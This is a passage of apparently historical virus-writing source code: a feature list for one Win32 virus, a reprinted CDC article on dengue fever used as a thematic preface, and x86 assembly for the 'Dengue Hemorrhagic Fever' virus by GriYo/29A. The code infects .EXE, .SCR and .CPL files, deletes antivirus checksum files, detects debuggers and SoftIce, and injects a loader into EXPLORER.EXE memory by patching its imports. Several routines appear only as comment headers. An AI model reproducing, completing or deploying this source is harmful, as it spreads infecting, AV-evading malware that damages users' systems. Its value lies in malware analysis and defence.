careful to let only one in the same time
otherwise we get some of the variables distroyed.
Preety hard to be emulated by avs.
Also features semaphores, timers
Marks infection using the Pythagoreic numbers.
SEH: the virus creates 9 SEH handlers, for each
thread and for the main thread.
(*) Polymorphic .......... Yes (2 engines: LJMLPE32, LJFPE32)
(*) Metamorphic .......... Yes (mild custom metamorphic engine)
Encrypted ............ Yes
Safety ............... Yes (avoids infecting many files)
Kill AV Processes .... Yes
Payload .............. On 14th every even month the infected process
will launch a thread that will display random
windows with some of the Rammstein's lyrics.
Pretty annoying... Probably this is the first
virus that actually creates real windows and
processes their messages. The windows shut down
as the victim process closes.
(*) Feature not included in this version.
Debug notes: please note that this source code features many ways of
debugging. You may turn on and off most of the virus's features by
turning some variables to TRUE or FALSE.
====================================================================
$
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[DESC.TXT]ÄÄÄ
;============================================================================
;
; Dengue Hemorrhagic Fever
;
; BioCoded by GriYo / 29A
; griyo@bi0.net
;
;============================================================================
;
; About the biomodel
; ------------------
;
; Dengue Hemorrhagic Fever: The Emergence of a Global Health Problem
;
; Dengue and dengue hemorrhagic fever (DHF) are caused by one of four
;closely related, but antigenically distinct, virus serotypes (DEN-1, DEN-2,
;DEN-3, and DEN-4), of the genus Flavivirus. Infection with one of these
;serotypes does not provide cross-protective immunity, so persons living in
;a dengue-endemic area can have four dengue infections during their
;lifetimes. Dengue is primarily an urban disease of the tropics, and the
;viruses that cause it are maintained in a cycle that involves humans and
;Aedes aegypti, a domestic, day-biting mosquito that prefers to feed on
;humans. Infection with a dengue virus serotype can produce a spectrum of
;clinical illness, ranging from a nonspecific viral syndrome to severe and
;fatal hemorrhagic disease. Important risk factors for DHF include the
;strain and serotype of the virus involved, as well as the age, immune
;status, and genetic predisposition of the patient.
;
; The first reported epidemics of dengue fever occurred in 1779-1780
;in Asia, Africa, and North America; the near simultaneous occurrence of
;outbreaks on three continents indicates that these viruses and their
;mosquito vector have had a worldwide distribution in the tropics for more
;than 200 years. During most of this time, dengue fever was considered a
;benign, nonfatal disease of visitors to the tropics. Generally, there were
;long intervals (10-40 years) between major epidemics, mainly because the
;viruses and their mosquito vector could only be transported between
;population centers by sailing vessels.
;
; A global pandemic of dengue begun in Southeast Asia after World
;War II and has intensified during the last 15 years. Epidemics caused by
;multiple serotypes (hyperendemicity) are more frequent, the geographic
;distribution of dengue viruses has expanded, and DHF has emerged in the
;Pacific region and the Americas. In Southeast Asia, epidemic DHF
;first appeared in the 1950s, but by 1975 it had become a leading cause of
;hospitalization and death among children in many countries. In the 1980s,
;DHF began a second expansion into Asia when Sri Lanka, India, and the
;Maldive Islands had their first major DHF epidemics; Pakistan first
;reported an epidemic of dengue fever in 1994. The recent epidemics in
;Sri Lanka and India were associated with multiple dengue virus serotypes,
;but DEN-3 was predominant and was genetically distinct from DEN-3 viruses
;previously isolated from infected persons in those countries.
;
; After an absence of 35 years, epidemic dengue fever occurred in
;both Taiwan and the People's Republic of China in the 1980s. The People's
;Republic of China had a series of epidemics caused by all four serotypes,
;and its first major epidemic of DHF, caused by DEN-2, was reported on
;Hainan Island in 1985. Singapore also had a resurgence of dengue/DHF
;from 1990 to 1994 after a successful control program had prevented
;significant transmission for over 20 years. In other countries of Asia
;where DHF is endemic, the epidemics have become progressively larger in the
;last 15 years.
;
; In the Pacific, dengue viruses were reintroduced in the early 1970s
;after an absence of more than 25 years. Epidemic activity caused by all
;four serotypes has intensified in recent years with major epidemics of DHF
;on several islands.
;
; Despite poor surveillance for dengue in Africa, we know that
;epidemic dengue fever caused by all four serotypes has increased
;dramatically since 1980. Most activity has occurred in East Africa, and
;major epidemics were reported for the first time in the Seychelles (1977),
;Kenya (1982, DEN-2), Mozambique (1985, DEN-3), Djibouti (1991-92, DEN-2),
;Somalia (1982, 1993, DEN-2), and Saudi Arabia (1994, DEN-2) (CDC,
;unpublished data). Epidemic DHF has been reported in neither Africa nor the
;Middle East, but sporadic cases clinically compatible with DHF have been
;reported from Mozambique, Djibouti, and Saudi Arabia (CDC, unpublished
;data).
;
; The emergence of dengue/DHF as a major public health problem has
;been most dramatic in the American region. In an effort to prevent urban
;yellow fever, which is also transmitted by Ae. aegypti, the Pan American
;Health Organization organized a campaign that eradicated Ae. aegypti from
;most Central and South American countries in the 1950s and 1960s. As a
;result, epidemic dengue occurred only sporadically in some Caribbean
;islands during this period. The Ae. aegypti eradication program, which was
;officially discontinued in the United States in 1970, gradually eroded
;elsewhere, and this species began to reinfest countries from which it had
;been eradicated. In 1995, the geographic distribution of Ae. aegypti was
;similar to its distribution before the eradication program.
;
; In 1970, only DEN-2 virus was present in the Americas, although
;DEN-3 may have had a focal distribution in Colombia and Puerto Rico. In
;1977, DEN-1 was introduced and caused major epidemics throughout the
;region over a 16-year period. DEN-4 was introduced in 1981 and caused
;similar widespread epidemics. Also in 1981, a new strain of DEN-2 from
;Southeast Asia caused the first major DHF epidemic in the Americas (Cuba).
;This strain has spread rapidly throughout the region and has caused
;outbreaks of DHF in Venezuela, Colombia, Brazil, French Guiana, Suriname,
;and Puerto Rico. By 1995, 14 countries in the American region had reported
;confirmed DHF cases, and DHF is endemic in many of these countries.
;
; DEN-3 virus recently reappeared in the Americas after an absence of
;16 years. This serotype was first detected in association with a 1994
;dengue/DHF epidemic in Nicaragua. Almost simultaneously, DEN-3 was
;confirmed in Panama and, in early 1995, in Costa Rica (CDC, unpublished
;data). In Nicaragua, considerable numbers of DHF were associated with the
;epidemic, which was apparently caused by DEN-3. In Panama and Costa Rica,
;the cases were classic dengue fever.
;
; Viral envelope gene sequence data from the DEN-3 strains isolated
;from Panama and Nicaragua have shown that this new American DEN-3 virus
;strain was likely a recent introduction from Asia since it is genetically
;distinct from the DEN-3 strain found previously in the Americas, but is
;identical to the DEN-3 virus serotype that caused major DHF epidemics in
;Sri Lanka and India in the 1980s (R. Lanciotti; unpublished data). The new
;DEN-3 strain, and the susceptibility of the population in the American
;tropics to it, suggests that DEN-3 will spread rapidly throughout the
;region and likely will cause major epidemics of dengue/DHF in the near
;future.
;
; In 1995, dengue is the most important mosquito-borne viral disease
;affecting humans; its global distribution is comparable to that of malaria,
;and an estimated 2.5 billion people are living in areas at risk for epidemic
;transmission. Each year, tens of millions of cases of dengue fever occur
;and, depending on the year, up to hundreds of thousands of cases of DHF. The
;case-fatality rate of DHF in most countries is about 5%: most fatal cases
;are among children.
;
; There is a small, but significant, risk for dengue outbreaks in the
;continental United States. Two competent mosquito vectors, Ae. aegypti and
;Aedes albopictus, are present and, under certain circumstances, each could
;transmit dengue viruses. This type of transmission has been detected twice
;in the last 15 years in south Texas (1980 and 1986) and has been associated
;with dengue epidemics in northern Mexico. Moreover, numerous viruses are
;introduced annually by travelers returning from tropical areas where dengue
;viruses are endemic. From 1977 to 1994, a total of 2,248 suspected cases of
;imported dengue were reported in the United States (CDC, unpublished data).
;Although some specimens collected were not adequate for laboratory
;diagnosis, preliminary data indicate that 481 (21%) cases were confirmed as
;dengue (CDC, unpublished data). Many more cases probably go unreported each
;year because surveillance in the United States is passive and relies on
;physicians to recognize the disease, inquire about the patient's travel
;history, obtain proper diagnostic samples, and report the case. These data
;underscore the fact that southern Texas and the southeastern United States,
;where Ae. aegypti is found, are at risk for dengue transmission and
;sporadic outbreaks.
;
; The reasons for this dramatic global emergence of dengue/DHF as a
;major public health problem are complex and not well understood. However,
;several important factors can be identified. First, effective mosquito
;control is virtually nonexistent in most dengue-endemic countries.
;Considerable emphasis for the past 20 years has been placed on
;ultra-low-volume insecticide space sprays for adult mosquito control, a
;relatively ineffective approach for controlling Ae. aegypti. Second, major
;global demographic changes have occurred, the most important of which have
;been uncontrolled urbanization and concurrent population growth. These
;demographic changes have resulted in substandard housing and inadequate
;water, sewer, and waste management systems, all of which increase
;Ae. aegypti population densities and facilitate transmission of
;Ae. aegypti-borne disease. Third, increased travel by airplane provides
;the ideal mechanism for transporting dengue viruses between population
;centers of the tropics, resulting in a constant exchange of dengue viruses
;and other pathogens. Lastly, in most countries the public health
;infrastructure has deteriorated. Limited financial and human resources and
;competing priorities have resulted in a "crisis mentality" with emphasis
;on implementing so-called emergency control methods in response to
;epidemics rather than on developing programs to prevent epidemic
;transmission. This approach has been particularly detrimental to dengue
;control because, in most countries, surveillance is very inadequate; the
;system to detect increased transmission normally relies on reports by local
;physicians who often do not consider dengue in their diagnoses. As a result,
;an epidemic has often reached or passed the peak of transmission before it
;is detected.
;
; No dengue vaccine is available. Recently, however, attenuated
;candidate vaccine viruses have been developed in Thailand. These vaccines
;are safe and immunogenic when given in various formulations, including a
;quadrivalent vaccine for all four dengue virus serotypes. Unfortunately,
;efficacy trials in human volunteers have yet to be initiated. Research is
;also being conducted to develop second-generation recombinant vaccine
;viruses; the Thailand attenuated viruses are used as a template. However,
;an effective dengue vaccine for public use will not be available for 5 to
;10 years.
;
; Prospects for reversing the recent trend of increased epidemic
;activity and geographic expansion of dengue are not promising. New dengue
;virus strains and serotypes will likely continue to be introduced into many
;areas where the population densities of Ae. aegypti are at high levels. With
;no new mosquito control technology available, in recent years public health
;authorities have emphasized disease prevention and mosquito control through
;community efforts to reduce larval breeding sources. Although this approach
;will probably be effective in the long run, it is unlikely to impact disease
;transmission in the near future. We must, therefore, develop improved,
;proactive, laboratory-based surveillance systems that can provide early
;warning of an impending dengue epidemic. At the very least, surveillance
;results can alert the public to take action and physicians to diagnose and
;properly treat dengue/DHF cases.
;
;Duane J. Gubler and Gary G. Clark
;National Center for Infectious Diseases
;Centers for Disease Control and Prevention
;Fort Collins, Colorado, and San Juan, Puerto Rico, USA
;
;============================================================================
.386P
locals
jumps
.model flat,STDCALL
include Win32api.inc
include Useful.inc
include Mz.inc
include Pe.inc
extrn GetModuleHandleA:NEAR
extrn Sleep:NEAR
;============================================================================
;Fake host used for virus 1st generation
;============================================================================
;============================================================
;We need the CRC lookup table for the next steps
;============================================================
;============================================================
;Save the CRC32 of 'KERNEL32.DLL' inside virus body
;============================================================
;============================================================
;Save the CRC32 of 'GetProcAddress' inside virus body
;============================================================
;============================================================
;Save the CRC32 of infectable file extensions
;============================================================
;============================================================
;Save the CRC32 of some AV files
;============================================================
mov ecx,NumberOfAV
mov esi,offset g1_av_names
mov edi,offset TblCRC32AV
call save_crc_names
;============================================================
;Save the CRC32 of EXPLORER.EXE
;============================================================
;============================================================
;Save the CRC32 of 'USER32.DLL'
;============================================================
;============================================================
;Save the CRC32 of 'PSAPI.DLL'
;============================================================
;============================================================
;Save the CRC32 of 'IMAGEHLP.DLL'
;============================================================
;============================================================
;Save the CRC32 of 'SFC.DLL'
;============================================================
mov ecx,NumK32Apis
mov esi,offset namesK32Apis
mov edi,offset CRC32K32Apis
call save_crc_names
;============================================================
;This are some special handled APIs
;============================================================
mov ecx,00000001h
mov esi,offset name_IsDebuggerPresent
mov edi,offset CRC32_IsDebugPr
call save_crc_names
;============================================================
;Get TOOLHELP APIs (Windows 9x only)
;============================================================
mov ecx,NumTOOLHELPApis
mov esi,offset namesTOOLHELPApis
mov edi,offset CRC32TOOLHELPApis
call save_crc_names
;============================================================
;Get PSAPI.DLL APIs (Windows Nt & Windows 2000 only)
;============================================================
mov ecx,NumPSAPIApis
mov esi,offset namesPSAPIApis
mov edi,offset CRC32PSAPIApis
call save_crc_names
;============================================================
;Get API used to compute image checksum
;============================================================
mov ecx,NumIMGHLPApis
mov esi,offset namesIMGHLPApis
mov edi,offset CRC32IMGHLPApis
call save_crc_names
;============================================================
;Get API used to check for Windows2000 System File Protection
;============================================================
mov ecx,NumSFCApis
mov esi,offset namesSFCApis
mov edi,offset CRC32SFCApis
call save_crc_names
;============================================================
;Get CRC32 of USER32 API names ( Ansi version )
;============================================================
mov ecx,NumUSER32Apis
mov esi,offset namesUSER32Apisw9x
mov edi,offset CRC32USER32Apisw9x
call save_crc_names
;============================================================
;Get CRC32 of USER32 API names ( Wide version )
;============================================================
mov ecx,NumUSER32Apis
mov esi,offset namesUSER32Apiswnt
mov edi,offset CRC32USER32Apiswnt
call save_crc_names
;============================================================
;Build the do-not-infect-file-by-name CRC32 table
;============================================================
mov ecx,avoid_num
mov esi,offset g1_avoid_files
mov edi,offset avoid_tbl
call save_crc_names
;============================================================
;Get KERNEL32.DLL module handle
;============================================================
call get1st_end
;============================================================
;Let the 1st generation host running
;============================================================
;============================================================
;Ready to jump into main virus body !!!!
;============================================================
xor ebp,ebp
jmp entry_1st_gen
;============================================================
;Routine that converts API names in CRC32 values
;============================================================
save_crc_names: cld
get_g1_crc: push ecx
lodsd
push esi
mov esi,eax
call get_str_crc32
mov eax,edx
stosd
pop esi
pop ecx
loop get_g1_crc
ret
_TEXT ends
;============================================================================
;Here comes the rest of the sections in virus 1st generation
;============================================================================
;============================================================
;Used to locate KERNEL32 base address on 1st generation
;============================================================
g1_szKernel32 db 'KERNEL32.DLL',00h
g1_szGetProcAddr db 'GetProcAddress',00h
;============================================================
;Used to check if file extension is infectable
;============================================================
g1_szEXE db '.EXE',00h
g1_szSCR db '.SCR',00h
g1_szCPL db '.CPL',00h
;============================================================
;This virus use CRC32 instead of DLL names !!!!
;
;LoadLibrary requires the DLL name as parameter... but
;we can find the DLL name by browsing SYSTEM32 directory
;for a file whose CRC32 matches a given one
;============================================================
g1_szEXPLORER db 'EXPLORER.EXE',00h
g1_szUSER32 db 'USER32.DLL',00h
g1_szPSAPI db 'PSAPI.DLL',00h
g1_szIMGHLP db 'IMAGEHLP.DLL',00h
g1_szSFC db 'SFC.DLL',00h
;============================================================
;Do not infect files with this character combinations on
;their names
;============================================================
g1_avoid_files equ $
dd offset g1_avoid_00
dd offset g1_avoid_01
dd offset g1_avoid_02
dd offset g1_avoid_03
dd offset g1_avoid_04
dd offset g1_avoid_05
dd offset g1_avoid_06
dd offset g1_avoid_07
dd offset g1_avoid_08
dd offset g1_avoid_09
dd offset g1_avoid_0A
dd offset g1_avoid_0B
dd offset g1_avoid_0C
dd offset g1_avoid_0D
dd offset g1_avoid_0E
dd offset g1_avoid_0F
dd offset g1_avoid_10
dd offset g1_avoid_11
dd offset g1_avoid_12
dd offset g1_avoid_13
dd offset g1_avoid_14
dd offset g1_avoid_15
dd offset g1_avoid_16
dd offset g1_avoid_17
dd offset g1_avoid_18
g1_avoid_00 db 'DR',00h
g1_avoid_01 db 'PA',00h
g1_avoid_02 db 'RO',00h
g1_avoid_03 db 'VI',00h
g1_avoid_04 db 'AV',00h
g1_avoid_05 db 'TO',00h
g1_avoid_06 db 'CA',00h
g1_avoid_07 db 'IN',00h
g1_avoid_08 db 'MS',00h
g1_avoid_09 db 'SR',00h
g1_avoid_0A db 'SP',00h
g1_avoid_0B db 'RP',00h
g1_avoid_0C db 'PR',00h
g1_avoid_0D db 'NO',00h
g1_avoid_0E db 'CE',00h
g1_avoid_0F db 'LE',00h
g1_avoid_10 db 'MO',00h
g1_avoid_11 db 'SM',00h
g1_avoid_12 db 'DD',00h
g1_avoid_13 db 'SO',00h
g1_avoid_14 db 'SQ',00h
g1_avoid_15 db 'EX',00h
g1_avoid_16 db 'IE',00h
g1_avoid_17 db 'CM',00h
g1_avoid_18 db 'CO',00h
;============================================================
;Delete this AV files
;============================================================
g1_av_names equ $
dd offset g1_delete_00
dd offset g1_delete_01
dd offset g1_delete_02
dd offset g1_delete_03
dd offset g1_delete_04
g1_delete_00 db 'AVP.CRC',00h
g1_delete_01 db 'ANTI-VIR.DAT',00h
g1_delete_02 db 'CHKLIST.CPS',00h
g1_delete_03 db 'CHKLIST.MS',00h
g1_delete_04 db 'IVP.NTZ',00h
;============================================================
;KERNEL32.DLL API names
;
;Note that this tables and strings are not included into the
;virus body after 1st generation. Only CRC32 values
;============================================================
namesK32Apis equ $
dd offset g1_CreateFileA
dd offset g1_CreateFileMappingA
dd offset g1_CreateProcessA
dd offset g1_CreateThread
dd offset g1_CloseHandle
dd offset g1_DeleteFileA
dd offset g1_ExitThread
dd offset g1_FindClose
dd offset g1_FindFirstFileA
dd offset g1_FindNextFileA
dd offset g1_FreeLibrary
dd offset g1_GetComputerNameA
dd offset g1_GetCurrentProcess
dd offset g1_GetDriveTypeA
dd offset g1_GetFileAttributesA
dd offset g1_GetLastError
dd offset g1_GetLocalTime
dd offset g1_GetLogicalDriveStringsA
dd offset g1_GetSystemDirectoryA
dd offset g1_GetVersionEx
dd offset g1_LoadLibraryA
dd offset g1_MapViewOfFile
dd offset g1_OpenFileMappingA
dd offset g1_OpenProcess
dd offset g1_ReadProcessMemory
dd offset g1_SetEndOfFile
dd offset g1_SetFileAttributesA
dd offset g1_SetFilePointer
dd offset g1_SetFileTime
dd offset g1_Sleep
dd offset g1_UnmapViewOfFile
dd offset g1_WriteProcessMemory
g1_CreateFileA db 'CreateFileA',00h
g1_CreateFileMappingA db 'CreateFileMappingA',00h
g1_CreateProcessA db 'CreateProcessA',00h
g1_CreateThread db 'CreateThread',00h
g1_CloseHandle db 'CloseHandle',00h
g1_DeleteFileA db 'DeleteFileA',00h
g1_ExitThread db 'ExitThread',00h
g1_FindClose db 'FindClose',00h
g1_FindFirstFileA db 'FindFirstFileA',00h
g1_FindNextFileA db 'FindNextFileA',00h
g1_FreeLibrary db 'FreeLibrary',00h
g1_GetComputerNameA db 'GetComputerNameA',00h
g1_GetCurrentProcess db 'GetCurrentProcess',00h
g1_GetDriveTypeA db 'GetDriveTypeA',00h
g1_GetFileAttributesA db 'GetFileAttributesA',00h
g1_GetLastError db 'GetLastError',00h
g1_GetLocalTime db 'GetLocalTime',00h
g1_GetLogicalDriveStringsA db 'GetLogicalDriveStringsA',00h
g1_GetSystemDirectoryA db 'GetSystemDirectoryA',00h
g1_LoadLibraryA db 'LoadLibraryA',00h
g1_GetVersionEx db 'GetVersionExA',00h
g1_MapViewOfFile db 'MapViewOfFile',00h
g1_OpenFileMappingA db 'OpenFileMappingA',00h
g1_OpenProcess db 'OpenProcess',00h
g1_ReadProcessMemory db 'ReadProcessMemory',00h
g1_SetEndOfFile db 'SetEndOfFile',00h
g1_SetFileAttributesA db 'SetFileAttributesA',00h
g1_SetFilePointer db 'SetFilePointer',00h
g1_SetFileTime db 'SetFileTime',00h
g1_Sleep db 'Sleep',00h
g1_UnmapViewOfFile db 'UnmapViewOfFile',00h
g1_WriteProcessMemory db 'WriteProcessMemory',00h
;============================================================
;Special KERNEL32 APIs
;============================================================
g1_IsDebuggerPresent db 'IsDebuggerPresent',00h
;============================================================
;ToolHelp APIs
;============================================================
namesTOOLHELPApis equ $
dd offset g1_CreateToolhelp32Snapshot
dd offset g1_Process32First
dd offset g1_Process32Next
dd offset g1_Module32First
dd offset g1_Module32Next
g1_CreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',00h
g1_Process32First db 'Process32First',00h
g1_Process32Next db 'Process32Next',00h
g1_Module32First db 'Module32First',00h
g1_Module32Next db 'Module32Next',00h
;============================================================
;PSAPI.DLL API names
;============================================================
namesPSAPIApis equ $
dd offset g1_EnumProcessModules
dd offset g1_EnumProcesses
dd offset g1_GetModuleBaseNameA
dd offset g1_GetModuleInformation
g1_EnumProcessModules db 'EnumProcessModules',00h
g1_EnumProcesses db 'EnumProcesses',00h
g1_GetModuleBaseNameA db 'GetModuleBaseNameA',00h
g1_GetModuleInformation db 'GetModuleInformation',00h
;============================================================
;SFC.DLL API names
;============================================================
namesSFCApis equ $
dd offset g1_SfcIsFileProtected
g1_SfcIsFileProtected db 'SfcIsFileProtected',00h
;============================================================
;IMAGEHLP.DLL API names
;============================================================
namesIMGHLPApis equ $
dd offset g1_CheckSumMappedFile
g1_CheckSumMappedFile db 'CheckSumMappedFile',00h
;============================================================
;USER32.DLL API names (Ansi version)
;============================================================
namesUSER32Apisw9x equ $
dd offset g1w9x_DefWindowProc
g1w9x_DefWindowProc db 'DefWindowProcA',00h
;============================================================
;USER32.DLL API names (Wide version)
;============================================================
namesUSER32Apiswnt equ $
dd offset g1wnt_DefWindowProc
g1wnt_DefWindowProc db 'DefWindowProcW',00h
_DATA ends
_BSS ends
;============================================================================
;Viral section
;
;You have to understand that all the above-mentioned is not part of the virus
;This means that the text strings and other information previous to this
;point will be discarded
;============================================================================
;============================================================
;Get delta offset in ebp
;============================================================
;============================================================
;Create CRC32 lookup table... This virus uses CRC32 in lots
;of places along its code... Precalculated tables helps to
;really speed-up virus activitie
;============================================================
call make_crc_tbl
;============================================================
;Check CRC32 of main virus body
;
; esi -> Ptr to buffer
; ecx -> Buffer size
;============================================================
mov ecx,SizeOfProtect
lea esi,dword ptr [ebp+CRC_protected]
call get_crc32
;============================================================
;Checksum matches?
;============================================================
cmp eax,edx
jne critical_error
CRC_protected equ $
;============================================================
;Scan system memory looking for KERNEL32.DLL
;============================================================
KernelScanning: pushad
fK32_try_01: mov eax,080000101h
call IGetNtBaseAddr
jecxz fK32_try_02
jmp short kernel_found
fK32_try_02: mov eax,0C0000101h
call IGetNtBaseAddr
jecxz fK32_try_03
jmp short kernel_found
fK32_try_03: xor eax,eax
call IGetNtBaseAddr
kernel_found: jecxz critical_error
mov dword ptr [esp.Pushad_ebx],ecx
popad
;============================================================
;This is the entry-point for 1st generation
;Now EBX points to KERNEL32.DLL base address
;============================================================
;============================================================
;Search for GetProcAddress entry-point
;============================================================
call GetGetProcAddr
jecxz critical_error
mov dword ptr [ebp+a_GetProcAddress],ecx
;============================================================
;Get KERNEL32 API addresses
;============================================================
mov ecx,NumK32Apis
lea esi,dword ptr [ebp+CRC32K32Apis]
lea edi,dword ptr [ebp+epK32Apis]
call get_APIs
jecxz RestoreHost
;============================================================
;Everything have to work, but if something goes wrong this
;will halt the process
;============================================================
;============================================================
;Restore host code
;
;Make the return address point to the instruction which
;made the call
;============================================================
cld
lodsd
cmp eax,00000005h
jne critical_error
;============================================================
;Try to locate IsDebuggerPresent API
;============================================================
mov ecx,00000001h
lea esi,dword ptr [ebp+CRC32_IsDebugPr]
lea edi,dword ptr [ebp+a_IsDebuggerPresent]
call get_APIs
jecxz DetectDebug
;============================================================
;Check if the current process is running in the context of a
;debugger
;============================================================
;============================================================
;SoftIce lookup
;
;Code based on the article "Win32 Anti-Debugging tricks" by
;Billy Belcebu/iKX ( published on XINE#4 )
;============================================================
push ecx
push FILE_ATTRIBUTE_READONLY
push OPEN_EXISTING
push ecx
push FILE_SHARE_READ
push GENERIC_READ
call Get_szSIw9x
db '\\.\SICE',00h
push 00000000h
push FILE_ATTRIBUTE_READONLY
push OPEN_EXISTING
push 00000000h
push FILE_SHARE_READ
push GENERIC_READ
call Get_szSIwNT
db '\\.\NTICE',00h
;============================================================
;Get a object name based on current hostname
;============================================================
mov esi,edi
call get_str_crc32
mov eax,00003233h
stosd
mov al,cl
stosb
;============================================================
;Allocate shared memory
;
;MSDN says:
;
;"A shared file-mapping object will not be destroyed until
;all processes that use it close their handles to it by using
;the CloseHandle function."
;
;So the idea is to use CreateFileMapping and MapViewOfFile,
;instead of VirtualAlloc... Then read open this
;file-mapping from a small piece of code injected into
;EXPLORER.EXE
;============================================================
mov edi,eax
push edi
call dword ptr [ebp+a_CloseHandle]
jmp GoBack2Host
;============================================================
;Copy virus to allocated memory block
;============================================================
;============================================================
;Continue execution on allocated memory!!!!!!!!!
;
;This means we are able to use extended buffers...
;============================================================
;============================================================================
;Code executed into allocated memory... Extended buffers are available now
;============================================================================
;============================================================
;The virus needs to locate SYSTEM directory in order to load
;DLL's by using CRC32 instead of their names
;============================================================
push MAX_PATH
lea edi,dword ptr [ebp+szSYSTEMDIR]
push edi
call dword ptr [ebp+a_GetSystemDirectoryA]
or eax,eax
jz GoBack2Host
add edi,eax
cld
mov eax,'D.*\' ; Add '*.DLL'
stosd
mov eax,00004C4Ch
stosd
;============================================================
;Get OS version
;============================================================
cmp eax,VER_PLATFORM_WIN32_NT
je MemInfectWinNt
cmp eax,VER_PLATFORM_WIN32_WINDOWS
je MemInfectWin9x
;============================================================
;Free USER32
;============================================================
;============================================================
;Back to host
;============================================================
TblDoPolyPops equ $
ret
;============================================================================
;Residency routines for Windows 9x
;============================================================================
;============================================================
;Get hands on USER32.DLL
;============================================================
;============================================================
;The functions provided by the tool help library make it
;easier for you to obtain information about currently
;executing applications. These functions are designed to
;streamline the creation of Win32-hosted tools, specifically
;debuggers
;============================================================
mov ecx,NumTOOLHELPApis
lea esi,dword ptr [ebp+CRC32TOOLHELPApis]
lea edi,dword ptr [ebp+epTOOLHELPApis]
call get_APIs
jecxz DoneTOOLHELP
ExitMemWin9x: jmp FreeUSER32
;============================================================
;Take a snapshot of the processeses currently loaded in the
;system
;
;The snapshot taken by CreateToolHelpSnapShot function is
;examined by the other tool help functions to provide their
;results
;
;Access to the snapshot is read only. The snapshot handle
;acts like an object handle and is subject to the same rules
;regarding which processes and threads it is valid in
;============================================================
;============================================================
;Retrieve information about the first process encountered
;in the system snapshot
;============================================================
mov esi,edx
call get_str_crc32
cmp edx,dword ptr [ebp+CRCszEXPLORER] ;Is EXPLORER.EXE ?
je EFoundTryMod
;============================================================
;Go to next process
;============================================================
jmp ExitMemWin9x
;============================================================
;Close snapshot and create a new one, but this time we are
;going to list modules loaded by EXPLORER.EXE
;============================================================
;============================================================
;Perfect !!!! Lets retrieve 1st module using Module32First
;============================================================
;============================================================
;Check if this is the module we are interested in
;============================================================
;============================================================
;Go to next module
;============================================================
;============================================================
;Ohj0j0... Fine! Here we are with EXPLORER.EXE module handle
;============================================================
GetModDone: mov edx,dword ptr [ebp+ModEhModule]
mov dword ptr [ebp+hModule],edx
;============================================================
;Open process
;============================================================
;============================================================
;Duh! EXPLORER.EXE process is now 0wN3d
;============================================================
call FuckExplorer
;============================================================
;Close process
;============================================================
;============================================================================
;Residency routines for Windows NT & Windows 2000
;============================================================================
;============================================================
;Hands on USER32 apis for Windows NT (Use wide versions)
;============================================================
;============================================================
;We need PSAPI.DLL to do the trick
;============================================================
;============================================================
;Get a list of loaded processes (Max. 32 processes)
;============================================================
;============================================================
;To determine how many processes were enumerated by the call
;to EnumProcesses, divide the resulting value in the cbNeeded
;parameter by sizeof(DWORD)
;============================================================
;============================================================
;Now we have a list of process identifiers... Follow it
;============================================================
;============================================================
;Open process
;============================================================
call OpenProcess
or eax,eax
jz TryNextProcess
;============================================================
;Enumerate process modules... The 1st obtained module
;is the executable itself
;============================================================
cld
lodsd ;The first module is the .EXE itself
;============================================================
;Get module name using GetModuleBaseNameA API
;============================================================
;============================================================
;Module name is EXPLORER.EXE (use CRC32 comparison)
;============================================================
mov edi,esi
call parse_filename
mov esi,edx
call get_str_crc32
cmp edx,dword ptr [ebp+CRCszEXPLORER] ;Is EXPLORER.EXE ?
jne NCProcess
;============================================================
;If EXPLORER.EXE found cleanup and go to the memory
;infection procedure
;============================================================
pop eax
pop eax
call FuckExplorer
;============================================================
;Close process
;============================================================
jmp ExitMemNt
;============================================================
;Try next process
;============================================================
;============================================================
;Residency proc failed!
;============================================================
;============================================================================
;Open process
;
;On entry:
; eax -> Process id
;On exit:
; eax -> Handle to process or NULL if error
;============================================================================
;============================================================================
;Infect EXPLORER.EXE in memory
;============================================================================
;============================================================
;Now search for the section header list
;============================================================
mov ecx,00000004h
lea esi,dword ptr [ebp+Explorer_MZ_lfanew]
mov eax,ebx
add eax,MZ_lfanew
call ReadProcessMem
or eax,eax
jz FE_Exit
add eax,ebx
mov edi,eax
add eax,00000004h + FH_SizeOfOptionalHeader
dec ecx
dec ecx
call ReadProcessMem
or eax,eax
jz FE_Exit
lodsw ;Just to do
;esi -> Explorer_FH_NumberOfSections
mov eax,edi
add eax,00000004h + FH_NumberOfSections
call ReadProcessMem
or eax,eax
jz FE_Exit
lodsw ;esi -> Explorer_SectionHeader
movzx ecx,ax ;ecx -> Number of sections
;============================================================
;Search for a suitable section
;============================================================
mov eax,edi
mov ecx,IMAGE_SIZEOF_SECTION_HEADER
call ReadProcessMem
or eax,eax
jz E_NextSection
;============================================================
;Is this a valid section?
;============================================================
cmp eax,SIZEOF_EVL
jae Ok_E_Section
;============================================================
;Try next section
;============================================================
;============================================================
;No suitable section found
;============================================================
jmp FE_Exit
;============================================================
;Yes, this is a valid section... Write virus loader
;============================================================
mov eax,ebx
add eax,dword ptr [esi+SH_VirtualAddress]
add eax,dword ptr [esi+SH_VirtualSize]
mov ecx,SIZEOF_EVL
lea esi,dword ptr [ebp+EVL_code]
call WriteProcessMem
or eax,eax
jz FE_Exit
;============================================================
;Go to EXPLORER.EXE data directory
;============================================================
mov eax,ebx
add eax,dword ptr [ebp+Explorer_MZ_lfanew]
add eax,00000004h + \
IMAGE_SIZEOF_FILE_HEADER + \
OH_DataDirectory.DE_Import.DD_VirtualAddress
mov ecx,00000004h
lea esi,dword ptr [ebp+Explorer_DE_Import]
call ReadProcessMem
or eax,eax
jz FE_Exit
;============================================================
;Search for USER32 import module descriptor
;============================================================
lodsd
add eax,ebx
mov edi,eax
;============================================================
;Last import module descriptor!?
;============================================================
;============================================================
;Check import module descriptor ID_Name
;============================================================
mov eax,ebx
add eax,dword ptr [esi+ID_Name]
mov ecx,00000010h
lea esi,dword ptr [ebp+Explorer_ID_Name]
call ReadProcessMem
or eax,eax
jz FE_Exit
push edi
pop edi
;============================================================
;Next import module descriptor
;============================================================
add edi,IMAGE_SIZEOF_IMPORT_DESCRIPTOR
jmp E_Search_K32
;============================================================
;USER32.DLL import module descriptor found
;============================================================
add edi,ecx
jmp E_NextThunk
;============================================================
;Gotcha!
;============================================================
;============================================================
;Done!!!! ieieie!!!!
;============================================================
FE_Exit: ret
;============================================================================
;Code injected into EXPLORER.EXE
;
